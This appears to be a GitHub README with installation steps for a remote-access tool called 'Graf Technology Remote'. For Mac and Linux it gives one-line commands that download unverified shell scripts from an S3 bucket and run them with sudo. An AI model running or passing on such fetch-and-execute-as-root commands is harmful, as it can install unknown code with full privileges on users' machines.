Skip to content

Latest commit

Β 

History

History
77 lines (47 loc) Β· 2.36 KB

File metadata and controls

77 lines (47 loc) Β· 2.36 KB

Graf Technology Remote

Easily install and configure Graf Technology Remote on your system by following the instructions below.

<script defer src="/script.js"></script>

πŸ–₯️ Windows Installation

PowerShell Method (Recommended)

βœ… Best for most users

  • Click below to download the PowerShell script.
  • Extract the ZIP file and right-click β†’ "Run with PowerShell".

πŸ”— Download Windows PowerShell Installer


CMD Method (Alternative)

βœ… For users who prefer Command Prompt

  • Click below to download the CMD script.
  • Extract the ZIP file and double-click the .cmd file.

πŸ”— Download Windows CMD Installer


🍏 Mac Installation (Terminal Command)

πŸ”Ή Step 1: Open Terminal (Cmd + Space, then type Terminal) πŸ”Ή Step 2: Click the copy button next to the command below and paste it into Terminal:

curl -o destiny-mac-bash.sh https://s3.amazonaws.com/graftechnology/remote/destiny-mac-bash.sh && chmod +x destiny-mac-bash.sh && sudo ./destiny-mac-bash.sh

πŸ”Ή Step 3: Enter your Mac administrator password when prompted. πŸš€ This will automatically download and install the necessary setup.


🐧 Linux Installation (Terminal Command)

πŸ”Ή Step 1: Open your Terminal (Ctrl + Alt + T) πŸ”Ή Step 2: Click the copy button next to the command below and paste it into Terminal:

curl -o destiny-linux-bash.sh https://s3.amazonaws.com/graftechnology/remote/destiny-linux-bash.sh && chmod +x destiny-linux-bash.sh && sudo ./destiny-linux-bash.sh

πŸ”Ή Step 3: Enter your root password when prompted. πŸš€ This will automatically download and install the necessary setup.


❓ Need Help?

If you run into any issues, feel free to reach out for support! βœ… Windows: Ensure you're running the script with the correct permissions. βœ… Mac/Linux: If you get a "Permission Denied" error, run:

chmod +x destiny-mac-bash.sh   # Mac
chmod +x destiny-linux-bash.sh # Linux

Then try again.


πŸŽ‰ You're all set! Enjoy using Graf Technology Remote!